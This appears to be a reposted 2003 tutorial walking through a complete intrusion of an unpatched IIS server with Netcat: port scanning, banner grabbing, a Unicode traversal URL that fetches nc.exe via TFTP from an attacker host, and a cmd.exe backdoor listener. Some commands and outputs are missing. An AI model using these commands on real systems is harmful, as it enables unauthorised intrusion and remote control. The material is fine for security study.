This post is written by one of my favorite InfoSec role models, Mati Aharoni. All credit goes to Mati Aharoni and to networknewz.
A few years back, Mati Aharoni, one of the core developers of the BackTrack penetration testing CD and founder of www.offensive-security.com, wrote a short security paper that demonstrated an entire hack from start to finish. It began with a port scan, and then continued with a banner grab, application vulnerability scan, setting up a back door, and finally transferring a file to the owned system. The file was a short text message that simply said, “You have been hacked!”
This hack was completed from start to finish with only one tool, Netcat.
NetCat Security
By Mati Aharoni
Expert Author
Article Date: 2003-10-20
Netcat is a utility that is able to write and read data across TCP and UDP network connections. If you are responsible for network or system security it essential that you understand the capabilities of Netcat. Netcat can be used as port scanner, a backdoor, a port redirector, a port listener and lots of other cool things too. It’s not always the best tool for the job, but if I was stranded on an island, I’d take Netcat with me. During this tutorial I’ll demonstrate a complete hack, using Netcat only, just to point out how versatile it is.
Port scanning with Netcat
A scanning example from Hobbit is “nc -v -w 2 -z target 20-30”. Netcat will try connecting to every port between 20 and 30 [inclusive] at the target, and will likely inform you about an FTP server, telnet server, and mailer along the way. The -z switch prevents sending any data to a TCP connection and very limited probe data to a UDP connection, and is thus useful as a fast scanning mode just to see what ports the target is listening on. To limit scanning speed if desired, -i will insert a delay between each port probe. Even though Netcat can be used for port scanning it isn’t its strength. A tool such as Nmap is better suited for port scanning.
Banner Grabbing with Netcat
So we’re interested in knowing what’s running behind port 80 and 21. We can use Netcat to grab port banners in the following way:
Let’s try to send a malformed URL which attempts to exploit the File Traversal vulnerability in unpatched IIS servers (Pre SP3). We will be using Netcat to Check for the vulnerability, and if found (and it will!), we will upload Netcat to the IIS server and demonstrate how we can use Netcat as a backdoor.
If you do not know what the Unicode File traversal exploit is, you can check the “IIS Unicode File Traversal” tutorial, or read it up on the net.
Basically this exploit allows us to “break out” of C:inetpubwwwroot and explore and execute programs anywhere on the attacked machine.
The point here isn’t hacking IIS, but the use of Netcat as a backdoor. Don’t get distracted by the whole “hacking into IIS” thing.
Great! Now we want to upload Netcat to the IIS server, so we’ll use TFTP and integrate the TFTP commands into the malformed URL.
Is transformed to:
http:///c+TFTP+-i+192.168.1.9+GET+nc.exe
Also take a note of your TFTP server, to see if it has successfully uploaded the nc.exe file:
So now we have Netcat uploaded to the IIS server, we want to use it to create a backdoor, in order to get a remote command prompt.
In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS server (lets choose port 10001) and then we can connect to this port from our attacking machine�using Netcat of course!
The command we want to give on the server looks like this:
nc -L -p 10001 -d -e cmd.exe
Here’s what that command does:
nc – tells Windows to run the nc.exe file with the following arguments:
-L Tells netcat to not close and wait for connections
-p Specifies a port to listen for a connection on
-d Tells Netcat to detach from the process we want it to run.
-e Tells what program to run once the port is connected to (cmd.exe)
If we now want to convert this command for Unicode URL use, it will look like this:
http:///c+nc+-L+-p+10001+-d+-e+cmd.exe
Now we will execute Netcat on the remote IIS machine:
Transferring files using Netcat
Let’s look at other possibilities Netcat can provide. Sat we wanted to transfer a file called hack.txt to the IIS server, and for some reason we don’t want to TFTP the file. We can use Netcat to transfer files from one system to another.
To receive a file named hack.txt on the destination system start Netcat on the IIS server with the following command:
nc -l -p 1234 >hack.txt
nc destination 1234
This is what hack.txt looks like
These are just a few of the wonderful option Netcat has to offer. Definitely worth RTFMing. Imagine all the wonderful possibilities of overcoming firewalls with netcat�
About the Author:
Mati Aharoni, MCSES, MCT, CCNA, CCSA, CISSP
Visit the Security through Hacking Web site at http://www.secureit.co.il for additional information.